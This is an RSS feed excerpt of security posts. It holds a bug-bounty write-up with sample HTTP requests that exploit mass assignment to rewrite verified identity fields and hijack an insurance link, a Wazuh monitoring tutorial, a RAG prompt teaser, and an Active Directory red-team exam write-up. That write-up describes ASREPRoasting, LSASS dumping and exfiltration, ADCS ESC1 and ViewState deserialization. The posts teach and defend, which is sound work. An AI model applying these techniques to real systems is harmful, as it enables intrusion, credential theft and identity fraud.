<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rxetdK2Ww9DfrKGHBtnmmA.png"></figure><blockquote>No customer support call. No re-verification.</blockquote><blockquote>Yet the name changes. The date of birth changes. The government ID number changes. But the eKYC status remains verified and every system that relies on that identity continue trusting the account as if nothing happened.</blockquote><p>Mass Assignment happens when an application takes fields from a user-controlled request and applies them to an internal object without checking which fields are allowed to change.</p><p>A simple version looks like this:</p><pre>{<br>"name": "Researcher",<br>"is_admin": true<br>}</pre><p>The developer may have intended to update only the name. But if the backend assigns every submitted field into the user object, the extra is_admin value may be written too.</p><p>The important part is not the admin flag. The important part is the missing field-level decision. The server should ask “this user is allowed to update this object, but are they allowed to update this field?”</p><p>That question matters because one object can contain fields with very different levels of trust. A profile object can contain a nickname, height, weight, legal name, birthdate, government ID number, verification status, and insurance metadata. They may sit next to each other in JSON, but they do not mean the same thing.</p><p>Well, most people first meet Mass Assignment through the admin flag example. A request is supposed to update a name. The attacker adds is_admin. The backend saves it. The user becomes an admin. That example is useful because it is easy to remember. It is also cleaner than most real findings.</p><p>This one started in a quieter place: an edit profile endpoint.</p><p>Changing a first name is normal.</p><p>Changing a verified government ID number is not.</p><p>Changing identity itself after verification is definitely not.</p><p>Once an account has passed eKYC, attributes such as name, date of birth, gender, and government-issued identification become part of the trust model. They are no longer profile preferences. <strong>They are identity claims.</strong></p><p>If those claims can be rewritten while the verification status remains intact, the problem is no longer profile editing. <em>It becomes identity drift.</em></p><p>This writeup is about that chain: Mass Assignment, identity drift, and a second-order insurance impact.</p><h3>The Profile</h3><p>The target was a platform with web and mobile applications. It stored user profile data, supported verified identity, and allowed users to link a third-party insurance or benefit record to their account.</p><p>The profile had ordinary fields and sensitive identity fields. From the normal application flow, some of these fields were restricted after we completed the eKYC verification . If a user wanted to change them, the expected path was customer support or another verification process.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/818/1*wM7B5ASk1RXDrgR15g2J1g.png"></figure><p>That business rule made sense. Once a field is used to represent identity, changing it should require more care than changing a preference.</p><p>The frontend understood this. The sensitive fields were not exposed as normal editable fields.</p><p>The backend did not enforce the same boundary.</p><h3>The Request</h3><p>The only attribute that could be edited directly through this flow was the phone number.</p><p>In simplified form, the request generated by the application looked like this:</p><pre>PUT /api/v1/profile/{user_id}/phone HTTP/2<br>Host: api.[REDACTED]<br>Cookie: [REDACTED]<br>Content-Type: application/json<br><br>{<br>  "phone_number": "+628123456789"<br>}</pre><p>The user was authenticated. The profile belonged to the user. The endpoint was meant to update a phone number and nothing more.</p><p>The test was simple: add fields the UI did not send in this flow.</p><pre>PUT /api/v1/profile/{user_id}/phone HTTP/2<br>Host: api.[REDACTED]<br>Cookie: [REDACTED]<br>Content-Type: application/json<br><br>{<br>  "phone_number": "+628123456789",<br>  "first_name": "EditedFirstName",<br>  "last_name": "EditedLastName",<br>  "date_of_birth": "1990-01-01",<br>  "id_number": "0000000000000000",<br>  "nationality": "Indonesia"<br>}</pre><p>The server returned success.</p><p>That was interesting, but it was not enough.</p><p>With Mass Assignment testing, 200 OK is only a signal. Some APIs accept a body, return success, and silently drop fields they do not want to save. If the value does not persist, the finding is much weaker.</p><p>So I read the profile back from the application.</p><p><strong>It confirmed. The sensitive fields had changed.</strong></p><p>The legal name changed. The birthdate changed. The gender changed. The government ID number changed. The secondary registry identifier changed.</p><p><strong>And the account still appeared verified.</strong></p><p>That combination is what made the finding important. The issue was not just that a user could edit their own profile. The issue was that a user could rewrite identity fields while keeping the trusted state attached to the account.</p><h3>Identity Drift</h3><p>The account was not stolen. The attacker did not access another user’s session. The object being edited still belonged to the current user.</p><p>But the identity attached to that object could move.</p><p>If a user can change legal name, birthdate, gender, government ID number, and registry identifiers without re-verification, the stored person can stop matching the person the platform originally verified.</p><p><em>That is a different kind of impersonation.</em></p><p>It is not impersonation by logging into the victim’s account. It is impersonation by rewriting the attacker’s own trusted profile until the platform’s records point to <strong>someone else.</strong></p><p>If an attacker knows enough identity attributes for a real person, the attacker-controlled account can be made to look like that person while still carrying a verified state.</p><h3>The Second Escalation</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lxObochqsnomI0kn2IBjZw.png"></figure><p>The platform also allowed users to link an insurance or benefit record to their profile.</p><p>That flow relied on information from two places:</p><ul><li>data supplied during the linking request, such as member or policy details</li><li>identity data already stored in the profile, rely only on the date of birth</li></ul><p>This kind of matching is actually common. A platform needs some way to decide whether an insurance or benefit record belongs to the current user.</p><p>The problem was not the comparison itself. The problem was what the comparison trusted. The date of birth was coming from a profile field that users could modify through the Mass Assignment vulnerability.</p><p>If the profile is verified and immutable, comparing against it has value. If the profile can be changed seconds before the comparison, the check becomes much weaker.</p><p>The Mass Assignment bug changed what the insurance flow was really asking. It was no longer only asking whether the insurance record matched the originally verified person. It was also asking whether the record matched the current profile values. Those values were attacker-controlled.</p><h3>The Chain</h3><p>The chain was straightforward.</p><p>First, use an attacker-controlled account.</p><p>Second, change the profile identity through the Mass Assignment bug. For the insurance path, date of birth was the useful field because it was part of the matching logic.</p><pre>PUT /api/v1/profile/{attacker_user_id} HTTP/2<br>Host: api.[REDACTED]<br>Cookie: [REDACTED]<br>Content-Type: application/json<br><br>{<br>"date_of_birth": "[TARGET_DOB]"<br>}</pre><p>Third, submit the linking request with the target insurance or benefit data.</p><pre>PUT /api/v1/benefits/link/{provider_id} HTTP/2<br>Host: api.[REDACTED]<br>Cookie: [REDACTED]<br>Content-Type: application/json<br><br>{<br>"member_id": "[TARGET_MEMBER_ID]",<br>"date_of_birth": "[TARGET_DOB]"<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/450/1*VpwKOtL-15Eg12J8TN-MuA.png"></figure><p><strong>The insurance record successfully linked to the attacker-controlled account.</strong></p><p>That is where the second impact appeared. The first impact was verified identity mutation. The second impact was downstream financial access.</p><p>The vulnerable endpoint looked like profile editing. The risk lived in what trusted that profile later.</p><h3>Re-Evaluation</h3><p>There is a common misunderstanding around self-profile bugs: if the user is editing their own account, the impact must be low. That is not always true.</p><p>The better question is: “what do the edited fields prove elsewhere?”</p><p>If the field is a first name before verification process, the answer may be nothing important.</p><p>If the field is a birthdate used for eligibility or matching, the answer changes.</p><p>If the field is a government ID number used for identity verification, the answer changes again.</p><p>If the account keeps its verified status after those values change, the impact changes even more.</p><p>In this case, the platform’s own product flow showed that these fields were sensitive. The user was not supposed to change them freely through the normal interface. Customer support or re-verification was the intended path.</p><p>The API bypassed that path, and another workflow trusted the result.</p><p>That is what made the finding more than “I can edit my profile.” It became “I can rewrite identity fields on a trusted account, then let another workflow trust the rewritten identity.”</p><h3>Remediation</h3><p>The fix is server-side field allowlisting.</p><p>Each update flow should define exactly which fields it is allowed to modify. A normal profile update endpoint should update only normal profile fields. Sensitive identity fields should not be writable just because they appear in the request body.</p><p>A safer model separates the data by trust level:</p><ul><li>ordinary profile fields that users can edit directly</li><li>sensitive identity fields that require support or re-verification</li><li>verification records that preserve what was checked and when</li><li>insurance or benefit-linking data that must be matched against trusted records</li></ul><p>The frontend can make the experience clearer, but it cannot be the control. Hidden fields, disabled inputs, and missing buttons do not protect an API.</p><p>The linking flow also needs to trust the right source. If birthdate is part of the matching logic, it should come from a record the user cannot freely rewrite immediately before linking the policy. If identity changes are allowed after verification, dependent insurance or benefit links should be reviewed, invalidated, or rechecked.</p><blockquote><strong>do not treat a profile value as proof unless the system also protects how that value is created and changed.</strong></blockquote><p>Mass Assignment is easy to underestimate when the request only changes fields on non impactful fields. But the real question is not only who owns the object. The real question is what authority each field carries after it is saved.</p><p>A birthdate can become an eligibility check. A government ID number can become identity evidence. A legal name can become a payout or policy-matching input. When those fields move without re-verification, every workflow that trusts them moves with them.</p><p>In this case, identity moved first.</p><p>Insurance followed.</p><p>That was the bug.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5eb2be4c1f8e" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/mass-assignment-and-the-identity-drift-from-profile-edit-to-insurance-takeover-5eb2be4c1f8e">Mass Assignment and the Identity Drift: From Profile Edit to Insurance Takeover</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time]]></title>
<description><![CDATA[OverviewIn this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, ...]]></description>
<link>https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</guid>
<pubDate>Mon, 06 Jul 2026 08:52:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Overview</h3><p>In this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, and deleting files and folders, and by running a benign malware simulation that triggered Windows processes leading to registry updates. This demonstrated how FIM detects not only direct malicious modifications but also related system-level activity that occurs during suspicious endpoint behavior, supporting incident investigation and root-cause analysis.</p><p>File Integrity Monitoring (FIM) is a security control used to track changes made to files and system configurations. It helps detect when files are created, modified, or deleted, and when critical system areas like the Windows Registry are altered. Since many attacks rely on changing files or registry keys to maintain persistence or evade detection, FIM provides an important layer of visibility into what’s happening on an endpoint. For this project, i used Windows endpoint.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IgesWE_x72ThLyu7T2u6Zg.jpeg"></figure><p>You can read more about File Integrity Monitoring in official Wazuh Documentation <a href="https://documentation.wazuh.com/current/user-manual/capabilities/file-integrity/how-to-configure-fim.html">here</a></p><h3>Configuration &amp; Detection</h3><ol><li><strong>Edit the agent’s ossec.conf file</strong></li></ol><ul><li>On the Windows endpoint, the Wazuh agent configuration file is located at</li></ul><pre>C:\Program Files (x86)\ossec-agent\ossec.conf</pre><p>and edit the ossec.conf file using notepad (open as an administrator).</p><ul><li>Add the directories you want to monitor within the &lt;syscheck&gt; block</li></ul><pre>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public\Downloads&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Lily\Desktop&lt;/directories&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*FvCOZ9zsrpNFIJueyym_mg.jpeg"><figcaption>ossec.conf</figcaption></figure><ul><li>Restart the Wazuh agent to apply changes</li></ul><pre>Restart-Service wazuh-agent</pre><p><strong>2. Test the Configuration</strong></p><ul><li><strong>Create files</strong></li></ul><p>I created a file on Desktop named “Malware Docs”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/309/1*t2EqYJ5s-CzT5CPjy3XF7Q.jpeg"></figure><p><strong>Alert Visualization</strong></p><p>Navigate to Endpoint security &gt; File Integrity Monitoring &gt; Events on the Wazuh dashboard to view the alert generated when the FIM module detects changes in the monitored file. The created file was logged as ‘file added’</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GovN3S1Zqm5TfSX4swCExw.jpeg"><figcaption>files created</figcaption></figure><ul><li><strong>Modify Files</strong></li></ul><p>To demonstrate file modification detection, I edited the contents of a file in the Downloads folder named “Malicious.txt”</p><p><strong>Alert Visualization</strong></p><p>This action was detected by Wazuh File Integrity Monitoring and logged as a “file modification” event in the dashboard.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U69WhITQ5XSQt_M2gCvdEw.jpeg"><figcaption>file modified</figcaption></figure><ul><li><strong>Delete Files</strong></li></ul><p>Several files were deleted, and this activity was detected by Wazuh File Integrity Monitoring and logged as “File deleted” events.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*d5uYJbK7Lj43OfFAV4yLBQ.jpeg"><figcaption>files deleted</figcaption></figure><ul><li><strong>Registry Modification</strong></li></ul><p>To demonstrate registry monitoring, I ran a benign malware simulation that attempted to establish persistence. This action triggered legitimate Windows system processes, which in turn updated related registry keys in the background. Wazuh detected these changes and logged them as registry modification events, demonstrating how File Integrity Monitoring can capture both direct malware activity and the secondary system behaviors it provokes.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WjRpltYtUzY_kx0L1hWpkg.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAQRxfW3ATRLAkQTG0PXFA.jpeg"></figure><h3>Dashboard Insights &amp; Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BqYTVh5qn5LCmGvzoPlpMA.jpeg"><figcaption>FIM Dashboard</figcaption></figure><p>This project demonstrated the practical value of File Integrity Monitoring through hands-on configuration, testing, and analysis using Wazuh. I successfully monitored file systems and Windows Registry keys, validated detection with manual changes and a malware simulation, and used the Wazuh dashboard to turn raw alerts into actionable insights.</p><p>FIM proved to be a critical visibility tool not just for compliance, but for real-time detection, rapid investigation, and understanding attack behaviors through change analysis. By capturing both legitimate and malicious modifications, it serves as a foundational layer in a proactive security posture.</p><p>Many thanks to <a href="https://medium.com/u/f6fc6f913781">Efam Harris</a> for inspiring me to take on this project.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=269e384f3fa7" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time-269e384f3fa7">Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Assemble Each RAG Generation Prompt from a Base Prompt Plus the Rules Each Question Needs]]></title>
<description><![CDATA[Enterprise Document Intelligence [Vol.1 #8B] - A fixed BASE, the rules each question needs, one registry: the dispatcher that turns a parsed question into a typed LLM call
The post Assemble Each RAG Generation Prompt from a Base Prompt Plus the Rules Each Question Needs appeared first on Towards ...]]></description>
<link>https://tsecurity.de/de/3646901/ai-nachrichten/assemble-each-rag-generation-prompt-from-a-base-prompt-plus-the-rules-each-question-needs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646901/ai-nachrichten/assemble-each-rag-generation-prompt-from-a-base-prompt-plus-the-rules-each-question-needs/</guid>
<pubDate>Sun, 05 Jul 2026 17:19:42 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise Document Intelligence [Vol.1 #8B] - A fixed BASE, the rules each question needs, one registry: the dispatcher that turns a parsed question into a typed LLM call</p>
<p>The post <a href="https://towardsdatascience.com/assemble-each-rag-generation-prompt-from-a-base-prompt-plus-the-rules-each-question-needs/">Assemble Each RAG Generation Prompt from a Base Prompt Plus the Rules Each Question Needs</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Certified AD Red Team Specialist (AD-RTS): Full Exam Write-Up]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: alisalive LinkedIn: camalzads Platform: CyberWarfare Labs (CWL) Certification: AD-RTS — Active Directory Red Team Specialist Environment: TELECOM INC. — Simulated Telecom-Sector Active Directory ForestA few months back I finished the AD-RTS course material from C...]]></description>
<link>https://tsecurity.de/de/3643709/hacking/certified-ad-red-team-specialist-ad-rts-full-exam-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643709/hacking/certified-ad-red-team-specialist-ad-rts-full-exam-write-up/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:06 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jTIA7B832VNBN7OzR31H_Q.png"></figure><h4>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br>GitHub: <a href="http://github.com/alisalive">alisalive </a><br>LinkedIn: <a href="http://linkedin.com/in/camalzads">camalzads </a><br>Platform: CyberWarfare Labs (CWL) <br>Certification: AD-RTS — Active Directory Red Team Specialist Environment: TELECOM INC. — Simulated Telecom-Sector Active Directory Forest</h4><p>A few months back I finished the AD-RTS course material from CyberWarfare Labs — four modules covering core Active Directory internals, Certificate Services abuse, Exchange Server exploitation, and ESXi-to-AD integration attacks. The course itself is dense, but the real test is the 30-day flag-based challenge lab that comes after it: a live, self-contained telecom environment called telecore.ad, built around a fictional company, TELECOM INC., with a Domain Controller, a SQL Server, a PKI/ADCS server, an Exchange server, an IIS-hosted internal web application, and an ESXi hypervisor sitting inside the same domain.</p><p>The exam is split into two independent adversary paths. Path 1 assumes zero credentials and zero prior access — you start with nothing but an IP range. Path 2 assumes you already have a low-privilege authenticated foothold on a public-facing web server and have to escalate from there. Both paths converge on the same underlying domain, but the entry vectors, the misconfigurations abused, and the final objectives are completely different. This write-up walks through the full methodology for both paths, exactly as I approached them, without listing the specific flag values captured along the way — the point here is the how, not the what.</p><p>Target: TELECOM INC. internal AD forest (telecore.ad) Stack: Windows Server 2022 Domain Controller, MS SQL Server (SQLEXPRESS), ADCS Certificate Authority, Exchange Server, IIS 10 / ASP.NET Web Forms, VMware ESXi with AD-joined authentication Assessment Type: Adversary emulation — unauthenticated black-box (Path 1) and authenticated foothold escalation (Path 2) Tools: nmap, dig, ldapsearch, Impacket suite (GetNPUsers, mssqlclient, wmiexec, secretsdump), hashcat, John the Ripper, GodPotato, certipy-ad, rpcclient, smbclient, pyVmomi, ysoserial.net, exchangelib, netexec</p><h3>Path 1: Unauthenticated Adversary</h3><p>The brief for Path 1 is deliberately minimal: you are handed a /24 and told to behave like a telecom-motivated APT starting from zero. No credentials, no internal knowledge, nothing but network reachability into the range.</p><h3>Mapping the DNS Infrastructure</h3><p>Every internal Windows environment leans on DNS to keep itself glued together, and that dependency is usually the first crack an attacker can pry open. A UDP sweep across port 53 on the target range revealed multiple name servers, one of which turned out to be a secondary, less-hardened DNS instance sitting outside the domain controller itself. Once I pointed my resolver configuration at that secondary server, a full PTR sweep across the subnet mapped every reverse DNS record in the environment — instantly revealing the hostnames and roles of every server in play: the domain controller, the SQL server, the certificate authority, the Exchange server, and the hypervisor, all before a single authenticated packet had been sent.</p><p>The real opening, though, came from testing whether that secondary DNS server would honor a zone transfer request. It did — both in the reverse zone and in the forward zone for telecore.ad. AXFR being enabled on an internet- or perimeter-adjacent DNS server is a classic, almost nostalgic misconfiguration, but it remains devastatingly effective: a single dig command handed over the complete internal namespace, service records, and IP-to-hostname mapping for the entire forest, again with zero authentication.</p><p>With the domain controller identified from the zone transfer, the next step was straightforward LDAP enumeration over anonymous bind — pulling the domain’s functional level, then walking the directory for every object under objectClass=user and objectClass=computer. This produces two things that matter enormously for what comes next: a clean list of real domain user accounts (filtered out from the noise of Exchange system mailboxes and health-check accounts that always clutter a mailbox-enabled AD), and a map of which machines in the domain hold interesting roles.</p><h3>From Kerberos Pre-Auth to a Foothold on SQL</h3><p>With a legitimate username list in hand, the obvious next move was to test for accounts with Kerberos pre-authentication disabled — the classic ASREPRoasting misconfiguration. Impacket’s GetNPUsers module does this cleanly: it walks the username list and, for any account with the UF_DONT_REQUIRE_PREAUTH flag set, returns a crackable AS-REP hash without ever needing to know the account’s password up front. One of the service-oriented accounts in the environment had exactly this misconfiguration, and the resulting hash fell quickly to a dictionary attack.</p><p>Cracked credentials in hand, the next question was where they were actually valid. Cross-referencing against the computer objects pulled during LDAP enumeration pointed straight at the SQL Server. Authenticating to it with Impacket’s MSSQL client confirmed the account held sysadmin-equivalent rights on the instance — enough to re-enable the xp_cmdshell extended stored procedure, which is disabled by default on modern SQL Server but, once flipped back on, gives arbitrary OS command execution in the context of the SQL service account.</p><h3>From Service Account to SYSTEM</h3><p>Command execution as the SQL service account is useful, but it’s not the finish line — the account only had ordinary service-level privileges. A privilege check revealed SeImpersonatePrivilege was enabled, which is the precondition for the entire family of “Potato” privilege escalation exploits. On a fully patched, modern Windows Server build, most of the older Potato variants (RoguePotato, JuicyPotato, PrintSpoofer) have been closed off, but GodPotato remains effective against current builds because it abuses a lower-level RPC/DCOM marshaling primitive rather than a specific, patchable service misconfiguration.</p><p>Dropping GodPotato onto the SQL box through the xp_cmdshell channel and triggering it against a reverse shell payload elevated the session cleanly from a low-privilege service account to NT AUTHORITY\SYSTEM.</p><p>With SYSTEM on the SQL server, the natural move was a credential harvest from LSASS. Rather than dropping a third-party dumping tool that’s likely to trip EDR, I used the built-in comsvcs.dll MiniDump export via rundll32 — a living-off-the-land technique that doesn’t touch disk with anything outside of what Windows already ships. The resulting dump was compressed, exfiltrated back to the attacking host over a simple HTTP upload listener, and parsed offline with pypykatz, which yielded NTLM hashes and Kerberos material for every account that had ever authenticated interactively or as a service on that box — including a domain account with a considerably more interesting set of permissions than the one I’d started with.</p><h3>Abusing ADCS: ESC1 to Domain Admin</h3><p>The newly recovered account turned out to have enrollment rights on a certificate template published by the internal PKI, and enumerating that CA with certipy-ad flagged the template as vulnerable to the ESC1 misconfiguration: the template allows the requester to supply an arbitrary Subject Alternative Name while also permitting client authentication, meaning any authenticated user with enroll rights can request a certificate asserting an identity that isn’t their own — including Domain Admin.</p><p>Before actually requesting the certificate, it’s worth noting the certifried mitigation Microsoft shipped in response to CVE-2022–26923: modern domain controllers now cross-check the SID embedded in the certificate’s security extension against the SAN identity, so simply putting an administrator’s UPN in the SAN field is no longer sufficient on its own — you also need the correct objectSid for that account, retrievable over RPC with a simple SID lookup against the domain controller. With both the UPN and the correct SID supplied in the certificate request, the CA issued a certificate that authenticated as the Domain Administrator, and that certificate could then be exchanged for the account’s NT hash directly — no interactive logon, no password reset, just a straightforward abuse of a legitimate PKI enrollment workflow.</p><p>From there it was a matter of cracking the recovered hash offline and confirming Domain Admin access against the domain controller directly, which also surfaced an interesting security group in the domain that doesn’t exist in a stock AD install: an ESX Admins group, hinting strongly at the next phase of the assessment.</p><h3>Pivoting into the Hypervisor</h3><p>ESXi hosts joined to Active Directory for centralized authentication are common in mixed enterprise environments, and telecore.ad had exactly this setup: the hypervisor trusted domain credentials, and membership in that ESX Admins group translated directly into root-equivalent access on the host. With the cracked Domain Admin credential, I authenticated to the ESXi host and used the pyVmomi SDK — VMware’s official Python bindings for the vSphere API — to programmatically enumerate every guest VM running on the hypervisor: power state, guest OS, VMware Tools status, and, critically, the free-text annotation/notes field attached to each VM object.</p><p>Notes fields on virtual machines are a surprisingly common dumping ground for exactly the kind of information that should never live there — and this environment was no exception. One particular guest VM had its local credentials sitting in plaintext in its own annotation field, visible to anyone with sufficient ESXi permissions to query VM metadata.</p><p>With ESXi root privileges and VMware Tools confirmed present on the target guest, the final move didn’t require touching the guest’s network interface at all. VMware Tools exposes a guest operations API that lets an ESXi-privileged operator execute arbitrary processes directly inside a running guest VM, authenticated with the guest’s own local credentials, entirely out-of-band from the guest’s actual network stack. I used this to launch a reverse shell process inside the guest, landing an interactive session on what the environment had positioned as its most sensitive internal system — completing the unauthenticated attack path from a bare IP range down to code execution on a hardened internal Linux host, entirely through Active Directory, certificate services, and hypervisor misconfigurations chained together.</p><h3>Path 2: Authenticated Adversary</h3><p>Path 2 starts from a completely different assumption: you already have low-privilege, unauthenticated-but-network-reachable access to a single public-facing IIS web application, and the objective is privilege escalation and lateral movement from that single entry point through to sensitive business data.</p><h3>Breaking the ASP.NET ViewState</h3><p>The target application was a fairly standard ASP.NET Web Forms site — the kind of legacy internal tooling that telecom operators tend to keep running long past its expected lifespan. Web Forms pages carry a hidden __VIEWSTATE field that encodes serialized page state, cryptographically signed (and optionally encrypted) using a machine key configured in the application’s web.config. If that machine key is ever exposed, the ViewState mechanism — designed purely for tamper protection — becomes a fully general .NET deserialization gadget, because the framework will happily deserialize and execute anything correctly signed with the right key.</p><p>The application exposed a reporting feature that read files from the local filesystem based on a URL parameter, with essentially no path validation. That’s a textbook local file inclusion primitive, and the highest-value target for it was obvious: the application’s own web.config, which — as is unfortunately common — held its ViewState validation key and algorithm directly in cleartext, alongside a setting that explicitly relaxed the URL-to-filesystem mapping to make path traversal easier rather than harder.</p><p>With the validation key, the algorithm, and the ViewState generator value scraped from the page’s own markup, I had everything ysoserial.net needs to forge a malicious ViewState blob. The TextFormattingRunProperties gadget chain — which abuses a WPF-related deserialization path to spawn an arbitrary process — turned that forged, correctly-signed ViewState payload into direct remote code execution the moment it was replayed against the application’s own postback endpoint. No credentials, no authentication bypass in the traditional sense — just a trust boundary (the machine key) that had leaked into a place it was never supposed to be reachable from.</p><h3>Registry Credentials and DPAPI</h3><p>Command execution through the ViewState gadget landed in the context of the IIS application pool identity — not a domain account, but still a foothold worth building on. A search through predictable locations on the host surfaced a custom internal application with its own registry key under HKLM\SOFTWARE, storing a domain service account’s username in cleartext alongside a Base64-encoded, DPAPI-protected password blob.</p><p>Storing secrets in a machine-scoped registry hive that any local process can read is already a mistake, but the developer had additionally used DPAPI’s LocalMachine protection scope rather than CurrentUser — meaning any process running on that specific machine, regardless of which user account it’s running as, can decrypt the blob using nothing but the machine’s own DPAPI master key. A short PowerShell snippet using the standard System.Security.Cryptography.ProtectedData class was enough to unwrap it and recover a plaintext domain credential for a genuinely useful service account.</p><h3>A Second Path Through ADCS</h3><p>That newly recovered service account turned out to have its own enrollment rights on a different certificate template in the same PKI — again vulnerable to the same ESC1 misconfiguration pattern seen in Path 1, just via a different template and a different starting account. The exploitation mechanics were identical: enumerate the vulnerable template, retrieve the target’s SID over RPC, forge a certificate request asserting the Domain Administrator’s identity, authenticate with the issued certificate, and recover the corresponding NT hash — landing Domain Admin from an entirely different starting point than Path 1, but through the same underlying PKI weakness. It’s a good illustration of why a single vulnerable certificate template rarely stays contained to one attack path; if more than one principal can enroll against it, it’s effectively a shared skeleton key for the domain.</p><p>From there, authenticating directly to the domain controller as Domain Admin opened up the full SMB share tree, and a look through the Windows Task Scheduler’s on-disk task definitions turned up something unusual: a scheduled task configured to run a PowerShell script under the Administrator’s own context, seemingly for routine mailbox maintenance. Pulling that script down and reading through it revealed hardcoded Exchange service credentials — again stored in plaintext, this time inside a script whose entire purpose was mailbox automation.</p><h3>Exchange Impersonation and Mailbox Enumeration</h3><p>The credentials recovered from that scheduled task belonged to an operations-focused service account, and a quick programmatic check against the Exchange server confirmed it had been granted the ApplicationImpersonation management role — an Exchange RBAC role that, by design, allows a single service account to act on behalf of any mailbox in the organization without needing that mailbox’s own credentials. It’s an entirely legitimate feature meant for backup, migration, and integration tooling, but when the account holding it also has weak or exposed credentials, it collapses into a universal mailbox-reading primitive.</p><p>Using the Exchange Web Services API with that account’s impersonation rights pointed at the Administrator’s own mailbox, I was able to enumerate the Inbox, Sent Items, and Drafts folders directly — no need to ever touch the Administrator’s actual password. Reading through the recovered correspondence surfaced exactly the kind of operational detail that internal email threads tend to accumulate over time: database credentials shared between a DBA and an operations contact for a production SQL instance, network infrastructure access details passed along in a router-maintenance thread, and references to an internal marketing campaign server mentioned in passing in an unrelated message chain. None of this was the result of a single exploit — it was simply what falls out of an inbox that’s been collecting operational chatter for months, once you have legitimate-looking read access to it.</p><p>That last stretch of Path 2 is worth reflecting on separately, because it’s a different category of finding than everything before it. Getting to Domain Admin via ADCS ESC1 is a hard technical exploit with a clean root cause and a clean fix — restrict enrollment rights, disable enrollee-supplied subject, or require manager approval on the template. Reading sensitive operational secrets out of an executive’s inbox because a service account with impersonation rights had weak credentials is a softer, more human failure mode — and honestly the one that’s hardest to fully close, because impersonation itself is a legitimate and necessary Exchange feature. The fix there isn’t technical elimination, it’s credential hygiene and RBAC scoping: impersonation rights should be scoped to the specific mailboxes a given integration actually needs, not granted organization-wide by default, and any account holding that role deserves the same protection posture as a Domain Admin account, because functionally it often is one.</p><h3>Closing Thoughts</h3><p>Looking back at both paths together, the pattern that stands out most isn’t any single vulnerability class — it’s how often the misconfigurations were individually mundane and collectively devastating. A DNS server that shouldn’t allow zone transfers. An account that shouldn’t skip Kerberos pre-auth. A certificate template that shouldn’t let requesters pick their own identity. A registry key that shouldn’t hold a password, even an encrypted one, at machine scope. A scheduled task script that shouldn’t hardcode credentials. None of these individually would make a headline vulnerability disclosure. Chained together, in the right order, they took an anonymous position on a /24 all the way to Domain Admin and hypervisor-level code execution, twice, through two completely different entry points.</p><p>That’s really the entire thesis of AD-RTS as a certification, and it’s the same lesson every serious AD engagement eventually teaches: defenders tend to think in terms of individual controls, and attackers think in terms of paths. The environments that hold up aren’t the ones with zero misconfigurations — that bar doesn’t exist in any real enterprise — they’re the ones where no single chain of small mistakes reaches all the way to the crown jewels.</p><p>If you’re working through AD-RTS yourself, my honest advice is to resist the urge to jump straight to the tooling. Every phase of this exam rewards understanding why a technique works before running it — ASREPRoasting only makes sense once you understand what Kerberos pre-authentication is actually protecting against, and ESC1 only clicks once you understand what a certificate template’s enrollment permissions and SAN policy are actually meant to enforce. The course material front-loads that theory for a reason.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B-p06VDmeewZgy9f12e7jQ.png"></figure><p><em>If you found this useful, feel free to connect on</em> <a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a> <em>or check out my tools on</em> <a 